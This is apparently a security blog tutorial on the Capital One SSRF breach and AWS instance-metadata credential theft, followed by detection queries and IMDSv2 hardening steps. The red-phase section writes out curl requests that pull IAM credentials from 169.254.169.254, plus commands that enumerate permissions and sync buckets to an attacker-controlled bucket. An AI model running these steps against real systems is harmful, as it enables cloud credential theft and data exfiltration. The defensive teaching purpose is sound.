<p>In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role — standard practice, necessary for the WAF to interact with other AWS services.</p>
<p>The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF&#8217;s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.</p>
<p>The attack chain, reconstructed from court documents and Capital One&#8217;s public disclosures:</p>
<pre><code class="" data-line="">1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: &quot;capital-one-waf-role&quot; (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers
</code></pre>
<p>IMDSv1 required no authentication. The WAF&#8217;s attached IAM role had <code class="" data-line="">s3:GetObject</code> and <code class="" data-line="">s3:ListBucket</code> permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.</p>
<p>Capital One paid a $190M settlement. AWS did not change IMDSv1 as a result — they had already released IMDSv2 in November 2019, months after the breach was discovered (July 2019). The breach timeline predates IMDSv2 availability. What it demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.</p>
<p>The revelation that the industry took away: <strong>IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack — in the application, in a WAF, in a sidecar, in a Lambda calling your EC2 — is a straight line to your IAM role credentials.</strong> The SSRF doesn&#8217;t need to be severe or complex. It just needs to reach <code class="" data-line="">169.254.169.254</code>.</p>
<hr />
<h2 id="red-phase-how-the-attack-works">Red Phase: How the Attack Works</h2>
<h3 id="what-ssrf-is">What SSRF Is</h3>
<p>Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker&#8217;s choosing. The server acts as a proxy: the request originates from the server&#8217;s network context, not the attacker&#8217;s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.</p>
<p>SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:<br />
&#8211; Image URL upload/preview (e.g., &#8220;fetch this avatar URL&#8221;)<br />
&#8211; Webhook configuration (server calls a URL you provide)<br />
&#8211; PDF generation from URL<br />
&#8211; Reverse proxies and WAFs with request-forwarding rules<br />
&#8211; Server-side URL validation endpoints</p>
<h3 id="why-the-metadata-endpoint-is-the-target">Why the Metadata Endpoint Is the Target</h3>
<p><code class="" data-line="">169.254.169.254</code> is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.</p>
<p>The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.</p>
<pre><code class="" data-line=""># (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what&#039;s available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
</code></pre>
<p>The response from Step 2 looks like this:</p>
<pre><code class="" data-line="">{
  &quot;Code&quot;: &quot;Success&quot;,
  &quot;LastUpdated&quot;: &quot;2019-03-22T18:03:30Z&quot;,
  &quot;Type&quot;: &quot;AWS-HMAC&quot;,
  &quot;AccessKeyId&quot;: &quot;ASIAQFAKEKEYIDEXAMPLE&quot;,
  &quot;SecretAccessKey&quot;: &quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY&quot;,
  &quot;Token&quot;: &quot;FQoDYXdzEJr//////////wEa...very-long-session-token...==&quot;,
  &quot;Expiration&quot;: &quot;2019-03-22T24:03:30Z&quot;
}
</code></pre>
<p>These are real, valid AWS temporary credentials. The <code class="" data-line="">Token</code> field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.</p>
<h3 id="the-full-attack-chain">The Full Attack Chain</h3>
<p>Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:</p>
<p><strong>Step 1: Confirm the SSRF and find the metadata endpoint</strong></p>
<pre><code class="" data-line=""># Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed
</code></pre>
<p><strong>Step 2: Exfiltrate credentials via SSRF</strong></p>
<pre><code class="" data-line=""># Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON
</code></pre>
<p><strong>Step 3: Use credentials from attacker&#8217;s system</strong></p>
<pre><code class="" data-line=""># Export the stolen credentials
export AWS_ACCESS_KEY_ID=&quot;ASIAQFAKEKEYIDEXAMPLE&quot;
export AWS_SECRET_ACCESS_KEY=&quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY&quot;
export AWS_SESSION_TOKEN=&quot;FQoDYXdzEJr...==&quot;

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid
</code></pre>
<pre><code class="" data-line="">{
    &quot;UserId&quot;: &quot;AROAQFAKEUSERID:i-01234567890abcdef0&quot;,
    &quot;Account&quot;: &quot;123456789012&quot;,
    &quot;Arn&quot;: &quot;arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0&quot;
}
</code></pre>
<p><strong>Step 4: Enumerate and exfiltrate</strong></p>
<pre><code class="" data-line=""># List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
aws iam simulate-principal-policy \
  --policy-source-arn &quot;arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0&quot; \
  --action-names &quot;s3:GetObject&quot; &quot;s3:PutObject&quot; &quot;ec2:DescribeInstances&quot; &quot;iam:ListRoles&quot; \
  --query &#039;EvaluationResults[?EvalDecision==`allowed`].EvalActionName&#039; \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/
</code></pre>
<h3 id="simulating-it-safely-test-imdsv1-enforcement-on-your-own-instances">Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances</h3>
<p>Before running detection controls, confirm which of your instances are still vulnerable:</p>
<pre><code class="" data-line=""># Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query &#039;Reservations[].Instances[].MetadataOptions&#039;
</code></pre>
<pre><code class="" data-line="">[
    {
        &quot;State&quot;: &quot;applied&quot;,
        &quot;HttpTokens&quot;: &quot;optional&quot;,           ← &quot;optional&quot; means IMDSv1 is still enabled
        &quot;HttpPutResponseHopLimit&quot;: 1,
        &quot;HttpEndpoint&quot;: &quot;enabled&quot;,
        &quot;HttpProtocolIpv6&quot;: &quot;disabled&quot;,
        &quot;InstanceMetadataTags&quot;: &quot;disabled&quot;
    }
]
</code></pre>
<p><code class="" data-line="">&quot;HttpTokens&quot;: &quot;optional&quot;</code> means IMDSv1 is still active. Any SSRF in the instance&#8217;s software stack can reach these credentials without a token.</p>
<pre><code class="" data-line=""># Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query &#039;Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }&#039; \
  --output table | \
  grep -E &quot;optional|INSTANCE&quot;
# Any row showing &quot;optional&quot; is IMDSv1-exposed
</code></pre>
<hr />
<h2 id="blue-phase-detection">Blue Phase: Detection</h2>
<h3 id="what-cloudtrail-logs-when-imds-credentials-are-abused">What CloudTrail Logs When IMDS Credentials Are Abused</h3>
<p>The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker&#8217;s use of the stolen credentials is what generates logs. The key signal is <strong><code class="" data-line="">GetCallerIdentity</code> from an unusual source IP</strong> paired with the instance role&#8217;s ARN appearing in CloudTrail from an IP that is not the instance itself.</p>
<pre><code class="" data-line=""># Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE=&quot;MyApplicationRole&quot;
INSTANCE_IP=&quot;10.0.1.50&quot;  # Your instance&#039;s known IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time &quot;$(date -d &#039;7 days ago&#039; --iso-8601=seconds)&quot; \
  --query &#039;Events[].CloudTrailEvent&#039; \
  --output text | \
  jq -r &#039;fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == &quot;&#039;&quot;${DETECTOR_ROLE}&quot;&#039;&quot;) |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }&#039; | \
  jq &quot;select(.sourceIP != \&quot;${INSTANCE_IP}\&quot;)&quot;
  # Any result here = role credentials being used from outside the instance
</code></pre>
<p>The tell: the <code class="" data-line="">userIdentity.arn</code> will contain the instance ID as the role session name (e.g., <code class="" data-line="">assumed-role/MyApplicationRole/i-01234567890abcdef0</code>). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.</p>
<h3 id="guardduty-the-purpose-built-finding">GuardDuty: The Purpose-Built Finding</h3>
<p>GuardDuty has a specific finding for exactly this scenario:</p>
<p><strong><code class="" data-line="">UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS</code></strong></p>
<p>This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely — meaning someone has physically exfiltrated the credentials to their own system and is using them from there.</p>
<pre><code class="" data-line=""># Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query &#039;DetectorIds[0]&#039; --output text)

aws guardduty list-findings \
  --detector-id &quot;${DETECTOR_ID}&quot; \
  --finding-criteria &#039;{
    &quot;Criterion&quot;: {
      &quot;type&quot;: {
        &quot;Equals&quot;: [
          &quot;UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS&quot;,
          &quot;UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS&quot;
        ]
      }
    }
  }&#039; \
  --query &#039;FindingIds&#039; --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id &quot;${DETECTOR_ID}&quot; \
    --finding-ids | \
  jq &#039;.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.NetworkConnectionAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }&#039;
</code></pre>
<p>A second finding to watch:</p>
<p><strong><code class="" data-line="">Recon:IAMUser/UserPermissions</code></strong> — fires when the stolen credentials are used to enumerate IAM permissions (the <code class="" data-line="">iam:SimulatePrincipalPolicy</code> call from the attacker&#8217;s Step 4 above). Often appears immediately before the data exfiltration events.</p>
<h3 id="vpc-flow-logs-connections-to-169254169254">VPC Flow Logs: Connections to 169.254.169.254</h3>
<p>VPC Flow Logs do not capture traffic to the IMDS endpoint by default — but they can capture egress from EC2 instances in ways that reveal post-exploitation. More useful for IMDS abuse is querying for unexpected source IPs calling the IMDS from within the VPC:</p>
<pre><code class="" data-line=""># Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = &#039;169.254.169.254&#039;
  AND action = &#039;ACCEPT&#039;
  AND from_unixtime(start) &gt; current_timestamp - interval &#039;24&#039; hour
ORDER BY start_time DESC;
</code></pre>
<p>If you see source IPs in this query that are not your EC2 instance&#8217;s primary private IP — for example, container IPs within the pod CIDR — and you have <code class="" data-line="">--http-put-response-hop-limit 1</code> set, those requests should be failing. If they&#8217;re succeeding, the hop limit is not enforced.</p>
<h3 id="imdsv2-hop-limit-why-it-blocks-containerized-attacks">IMDSv2 Hop Limit: Why It Blocks Containerized Attacks</h3>
<p>The hop limit is a separate defense from the token requirement. With <code class="" data-line="">--http-put-response-hop-limit 1</code>, the PUT request to obtain an IMDSv2 token has a TTL of 1. When a process running inside a container tries to reach the IMDS, the request must traverse:</p>
<pre><code class="" data-line="">Container network namespace → veth pair → host network namespace → hypervisor IMDS endpoint
</code></pre>
<p>That traversal decrements the TTL below 1, and the PUT request never reaches the IMDS endpoint. The token is never issued. The GET request that follows has no token and — if <code class="" data-line="">--http-tokens required</code> is also set — is rejected.</p>
<pre><code class="" data-line="">Hop limit = 1:
  Container → veth → [TTL=0, packet dropped]
  IMDS never receives the PUT, never issues a token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token is issued; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS
</code></pre>
<p>For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity eliminates static credentials</a> — pods get short-lived tokens scoped to their service account, not the node&#8217;s IAM role.</p>
<hr />
<h2 id="purple-phase-structural-fixes">Purple Phase: Structural Fixes</h2>
<h3 id="fix-1-enforce-imdsv2-the-non-negotiable-control">Fix 1: Enforce IMDSv2 — The Non-Negotiable Control</h3>
<p>This is not optional. Every EC2 instance running production workloads should have <code class="" data-line="">--http-tokens required</code>. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.</p>
<pre><code class="" data-line=""># Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query &#039;Reservations[].Instances[].MetadataOptions&#039;
# &quot;HttpTokens&quot;: &quot;required&quot; confirms IMDSv2 is enforced
</code></pre>
<pre><code class="" data-line=""># Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version &#039;$Latest&#039; \
  --launch-template-data &#039;{
    &quot;MetadataOptions&quot;: {
      &quot;HttpTokens&quot;: &quot;required&quot;,
      &quot;HttpPutResponseHopLimit&quot;: 1,
      &quot;HttpEndpoint&quot;: &quot;enabled&quot;
    }
  }&#039;

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version &#039;$Latest&#039;
</code></pre>
<pre><code class="" data-line=""># Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently &quot;optional&quot;
aws ec2 describe-instances \
  --query &#039;Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId&#039; \
  --output text | \
  tr &#039;\t&#039; &#039;\n&#039; | \
  while read instance_id; do
    echo &quot;Enforcing IMDSv2 on: $instance_id&quot;
    aws ec2 modify-instance-metadata-options \
      --instance-id &quot;$instance_id&quot; \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done
</code></pre>
<h3 id="fix-2-scp-to-block-imdsv1-org-wide">Fix 2: SCP to Block IMDSv1 Org-Wide</h3>
<p>An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can&#8217;t accidentally revert it.</p>
<pre><code class="" data-line="">{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;RequireIMDSv2OnNewInstances&quot;,
      &quot;Effect&quot;: &quot;Deny&quot;,
      &quot;Action&quot;: &quot;ec2:RunInstances&quot;,
      &quot;Resource&quot;: &quot;arn:aws:ec2:*:*:instance/*&quot;,
      &quot;Condition&quot;: {
        &quot;StringNotEquals&quot;: {
          &quot;ec2:MetadataHttpTokens&quot;: &quot;required&quot;
        }
      }
    },
    {
      &quot;Sid&quot;: &quot;DenyIMDSv1ReEnablement&quot;,
      &quot;Effect&quot;: &quot;Deny&quot;,
      &quot;Action&quot;: &quot;ec2:ModifyInstanceMetadataOptions&quot;,
      &quot;Resource&quot;: &quot;*&quot;,
      &quot;Condition&quot;: {
        &quot;StringEquals&quot;: {
          &quot;ec2:MetadataHttpTokens&quot;: &quot;optional&quot;
        }
      }
    }
  ]
}
</code></pre>
<p>Apply this SCP to all OUs except the management account. New <code class="" data-line="">ec2:RunInstances</code> calls that don&#8217;t include <code class="" data-line="">MetadataOptions.HttpTokens=required</code> will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.</p>
<h3 id="fix-3-oidc-workload-identity-eliminate-the-credential-entirely">Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely</h3>
<p>Enforcing IMDSv2 removes the SSRF-to-IMDS path. <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity eliminates static credentials</a> removes the entire credential from the picture — there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.</p>
<p>For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod&#8217;s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node&#8217;s instance profile requires no IAM permissions for application workloads.</p>
<pre><code class="" data-line=""># EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials
</code></pre>
<h3 id="fix-4-restrict-ssrf-at-the-network-and-application-layer">Fix 4: Restrict SSRF at the Network and Application Layer</h3>
<p>IMDSv2 enforcement is the primary control. Defence in depth adds:</p>
<pre><code class="" data-line=""># WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name &quot;BlockSSRFToIMDS&quot; \
  --scope REGIONAL \
  --capacity 10 \
  --rules &#039;[
    {
      &quot;Name&quot;: &quot;BlockIMDSAccess&quot;,
      &quot;Priority&quot;: 0,
      &quot;Statement&quot;: {
        &quot;ByteMatchStatement&quot;: {
          &quot;SearchString&quot;: &quot;169.254.169.254&quot;,
          &quot;FieldToMatch&quot;: {&quot;QueryString&quot;: {}},
          &quot;TextTransformations&quot;: [{&quot;Priority&quot;: 0, &quot;Type&quot;: &quot;NONE&quot;}],
          &quot;PositionalConstraint&quot;: &quot;CONTAINS&quot;
        }
      },
      &quot;Action&quot;: {&quot;Block&quot;: {}},
      &quot;VisibilityConfig&quot;: {
        &quot;SampledRequestsEnabled&quot;: true,
        &quot;CloudWatchMetricsEnabled&quot;: true,
        &quot;MetricName&quot;: &quot;BlockIMDSAccess&quot;
      }
    }
  ]&#039; \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS
</code></pre>
<pre><code class="" data-line=""># Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance&#039;s AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly
</code></pre>
<p>Note: iptables-based egress filtering is a secondary control. A root process, or any process with <code class="" data-line="">CAP_NET_ADMIN</code>, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Legacy AWS SDK versions that only support IMDSv1.</strong> AWS SDK for Java v1 and Python (boto3 &lt; 1.9.220) do not support IMDSv2 by default. Enforcing <code class="" data-line="">--http-tokens required</code> on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule <code class="" data-line="">ec2-imdsv2-check</code> flags non-compliant instances but does not check SDK versions — that inventory step is manual.</p>
<pre><code class="" data-line=""># Check boto3 version on an instance
python3 -c &quot;import boto3; print(boto3.__version__)&quot;
# Requires &gt;= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name &quot;aws-java-sdk-core-*.jar&quot; 2&gt;/dev/null | \
  while read jar; do
    unzip -p &quot;$jar&quot; META-INF/MANIFEST.MF 2&gt;/dev/null | grep &quot;Implementation-Version&quot;
  done
# AWS SDK for Java v1 &lt; 1.11.678 does not support IMDSv2 by default
</code></pre>
<p><strong>EKS node groups and hop limit 2.</strong> If you run EKS and pods need to use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS — they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. The <code class="" data-line="">aws eks create-managed-node-group</code> default is hop limit 2 for this reason; you can reduce it once you&#8217;ve confirmed nothing breaks.</p>
<p><strong>GuardDuty&#8217;s 5–15 minute detection delay.</strong> <code class="" data-line="">UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration</code> is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.</p>
<pre><code class="" data-line=""># EventBridge rule: alert immediately on S3 data events from unexpected sources
# (complements GuardDuty&#039;s delayed finding)
aws events put-rule \
  --name &quot;S3DataEventFromUnexpectedSource&quot; \
  --event-pattern &#039;{
    &quot;source&quot;: [&quot;aws.s3&quot;],
    &quot;detail-type&quot;: [&quot;AWS API Call via CloudTrail&quot;],
    &quot;detail&quot;: {
      &quot;eventSource&quot;: [&quot;s3.amazonaws.com&quot;],
      &quot;eventName&quot;: [&quot;GetObject&quot;],
      &quot;userIdentity&quot;: {
        &quot;sessionContext&quot;: {
          &quot;sessionIssuer&quot;: {
            &quot;userName&quot;: [&quot;MyApplicationRole&quot;]
          }
        }
      }
    }
  }&#039; \
  --state ENABLED
</code></pre>
<p><strong>Disabling the IMDS endpoint entirely.</strong> You can set <code class="" data-line="">--http-endpoint disabled</code> to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<h3 id="imdsv1-vs-imdsv2">IMDSv1 vs IMDSv2</h3>
<table>
<thead>
<tr>
<th>Attribute</th>
<th>IMDSv1</th>
<th>IMDSv2</th>
</tr>
</thead>
<tbody>
<tr>
<td>Authentication</td>
<td>None — any HTTP GET works</td>
<td>PUT to <code class="" data-line="">/latest/api/token</code> required first to obtain a session token</td>
</tr>
<tr>
<td>SSRF exploitable</td>
<td>Yes — one HTTP request returns credentials</td>
<td>No — SSRF cannot initiate a PUT before a GET in standard flows</td>
</tr>
<tr>
<td>Session token TTL</td>
<td>N/A</td>
<td>1 second to 21,600 seconds (configurable)</td>
</tr>
<tr>
<td>Hop limit enforcement</td>
<td>N/A</td>
<td>Enforced on PUT — TTL=1 blocks containers from reaching IMDS</td>
</tr>
<tr>
<td>AWS CLI enforcement</td>
<td><code class="" data-line="">--http-tokens optional</code> (default on old instances)</td>
<td><code class="" data-line="">--http-tokens required</code></td>
</tr>
<tr>
<td>Capital One risk</td>
<td>Present</td>
<td>Eliminated</td>
</tr>
</tbody>
</table>
<h3 id="imdsv2-enforcement-commands-by-provider">IMDSv2 Enforcement Commands by Provider</h3>
<table>
<thead>
<tr>
<th>Provider</th>
<th>Enforcement Command</th>
<th>Scope</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>AWS — running instance</strong></td>
<td><code class="" data-line="">aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1</code></td>
<td>Single instance</td>
</tr>
<tr>
<td><strong>AWS — launch template</strong></td>
<td>Add <code class="" data-line="">&quot;MetadataOptions&quot;: {&quot;HttpTokens&quot;: &quot;required&quot;}</code> to launch template data</td>
<td>All instances from template</td>
</tr>
<tr>
<td><strong>AWS — org SCP</strong></td>
<td>Deny <code class="" data-line="">ec2:RunInstances</code> where <code class="" data-line="">ec2:MetadataHttpTokens != required</code></td>
<td>All accounts in org</td>
</tr>
<tr>
<td><strong>AWS — Config rule</strong></td>
<td><code class="" data-line="">ec2-imdsv2-check</code> managed rule</td>
<td>Compliance audit</td>
</tr>
<tr>
<td><strong>GCP</strong></td>
<td>GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires <code class="" data-line="">Metadata-Flavor: Google</code> header — this header cannot be set via SSRF in most frameworks</td>
<td>N/A</td>
</tr>
<tr>
<td><strong>Azure</strong></td>
<td>Azure IMDS requires <code class="" data-line="">Metadata: true</code> header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)</td>
<td>N/A</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Note on GCP and Azure:</strong> Both providers designed their metadata services with SSRF resistance in mind. The <code class="" data-line="">Metadata-Flavor: Google</code> and <code class="" data-line="">Metadata: true</code> headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.</p>
</blockquote>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>IMDSv1 has no authentication</strong>: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required</li>
<li>The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale</li>
<li><code class="" data-line="">--http-tokens required</code> is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable</li>
<li>GuardDuty&#8217;s <code class="" data-line="">UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration</code> finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting</li>
<li>The structural solution eliminates the credential entirely: <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity eliminates static credentials</a> on EKS/GKE means pods get scoped, short-lived tokens; the node&#8217;s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
